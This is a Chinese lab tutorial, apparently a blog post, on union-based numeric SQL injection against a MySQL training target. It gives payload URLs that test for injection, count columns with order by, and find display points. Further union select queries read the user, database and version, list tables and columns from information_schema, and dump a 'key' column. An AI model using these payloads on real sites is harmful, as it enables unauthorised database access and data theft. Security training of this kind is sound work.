MySQL联合注入之数字型注入

SQL注入原理
SQL注入攻击是网站未对sql语句,完全校验通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。一切与数据库存在交互的地方都是有可能存在注入漏洞的。
这难度程度是比较简单的,但是需要一些SQL语句基础。
测试环境:东塔靶场
https://labs.do-ta.com/index/course/detail/id/51
测试工具:hackebay
1.判断是否存在注入
我们可以在url的id=1后添加一个单引号(‘)执行,看语句是否会带入查询
如果语句带入查询的话,单引号都是成对出现的而这里只有一个,那么语句肯定是不成立的从而报错,来判断是否存在注入,页面返回错误则说明存在注入。
http://120.25.24.45:32333/index.php?id=1
在这里插入图片描述也可以使用and逻辑运算符来判断,and 1=1 ,1=1肯定为真,则页面返回正常
1=2为假,1永远不可能等于2为假,则页面返回错误
在这里插入图片描述在这里插入图片描述2.使用order by 查询字段数 ,这里查询到字段为8!
120.25.24.45:32333/index.php?id=1 order by 8
在这里插入图片描述3.判断会显点 使用union select 联合查询,跟据上面我们查询到的字段数进行查询,查询的时候在=1前面家一个-号让前面的语句报错,执行后面的语句从而查询到回显点。
120.25.24.45:32333/index.php?id=-1 union select 1,2,3,4,5,6,7,8

在这里插入图片描述4.查询当前用户名与数据库及数据库版本
user() 查询用户名
http://120.25.24.45:32024/index.php?id=-1%20union%20select%201,user(),3,4,5,6,7,8
database()查询当前数据库
http://120.25.24.45:32024/index.php?id=-1 union select 1,database(),3,4,5,6,7,8
version() 查询数据库版本
http://120.25.24.45:32024/index.php?id=-1 union select 1,version(),3,4,5,6,7,8
在这里插入图片描述5.查询表名
http://120.25.24.45:32024/index.php?id=-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema = ‘dotaxueyuan’ ),4,5,6,7,8
表名为:key,users
在这里插入图片描述6.查询列名
http://120.25.24.45:32024/index.php?id=-1%20union%20select%201,database(),(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=%20%27dotaxueyuan%27%20and%20table_name%20=%20%27key%27),4,5,6,7,8
列名为:ID,key
在这里插入图片描述7.爆数据
http://120.25.24.45:32502/index.php?id=-1 union select 1,database(),(select group_concat(key)from dotaxueyuan.key),4,5,6,7,8
在这里插入图片描述语句可以看见爆出key值了,不用关注URL的对错主要看Payloads
注:千万不要对别人的网站进行测试。如若使用别人的网站做测试,造成的一切后果自负

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值